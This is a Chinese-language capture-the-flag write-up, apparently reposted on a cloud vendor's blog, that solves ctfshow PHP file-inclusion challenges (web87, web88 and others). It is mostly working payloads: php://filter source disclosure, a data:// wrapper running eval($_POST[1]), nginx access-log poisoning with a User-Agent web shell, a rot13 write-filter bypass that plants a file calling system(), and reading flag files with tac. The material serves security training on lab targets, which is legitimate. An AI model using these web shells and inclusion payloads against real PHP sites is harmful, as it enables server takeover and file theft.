[CTF]ctfshow文件包含

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: [CTF]ctfshow文件包含

尝试使用伪协议

直接使用

?file=php://filter/convert.base64-encode/resource=flag.php

将flag.php的内容包含进来,以base64 encode 的方式回显,使用base64 decode即可得到flag.php的源码

GET中过滤了php

考虑使用其他伪协议

?file=data://text/plain,<?= eval($_POST[1]) ?>

在post中1=system("tac flag.php");

GET中过滤了php data

考虑构造特殊的User-Agent,让访问信息记录到日志文件中,包含含有User-Agent 值的日志

使用User-Agent为<?php eval($_POST[1]); ?>发包

这次访问被记录到日志中

在GET中包含日志文件,?file=/var/log/nginx/access.log

同时在POST中,尝试执行命令1=phpinfo();,查看回显

(在hackbar 修改ua头很方便,记得把构造的ua头取消勾选,日志记录了多个eval就会在执行时执行多次)


有几个脚本题之后再分析


web87题目

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
    
}else{
    highlight_file(__FILE__);
}

?file=php://filter/write=string.rot13/resource=2.php

<?php system("tac f*.php");?> <?cuc flfgrz("gnp s*.cuc");?>

之后查看2.php即可

web88

?file=data://text/plain;base64,<?php system('tac fl*.php');echo 'adc';?>aacc

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
安全 前端开发 PHP
[PiKaChu靶场通关]文件包含file include
[PiKaChu靶场通关]文件包含file include
740 0
[PiKaChu靶场通关]文件包含file include
|
6月前
|
SQL 安全 PHP
DVWA File Inclusion 通关解析
DVWA File Inclusion 通关解析
|
6月前
|
存储 SQL 安全
DVWA File Upload 通关解析
DVWA File Upload 通关解析
|
8月前
|
SQL XML 安全
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
BugKu CTF(Web):sqli-0x1 & baby lfi & baby lfi 2
|
8月前
|
安全 网络安全 数据安全/隐私保护
Pikachu RCE 通关解析
Pikachu RCE 通关解析
|
8月前
|
Ubuntu 网络安全 开发者
CTF本地靶场搭建——GZ:CTF安装
GZCTF是一个开源的网络安全竞技平台,由GZTimeWalker维护,提供环境供爱好者和专业人士通过解决CTF题目提升技能。本文档介绍了在Ubuntu 20.04上部署GZCTF的步骤,包括安装操作系统、配置清华镜像源、更新软件、安装Docker和docker-compose,以及根据GZCTF文档创建配置文件并启动服务。完成部署后,用户可在浏览器中看到GZCTF平台。
|
8月前
|
XML 安全 JavaScript
|
8月前
|
前端开发 应用服务中间件 PHP
[CTF]ctfshow 文件上传
[CTF]ctfshow 文件上传
|
8月前
|
Shell PHP
[CTF]ctfshow命令执行
[CTF]ctfshow命令执行
|
8月前
|
PHP
[CTF]ctfshow php特性
[CTF]ctfshow php特性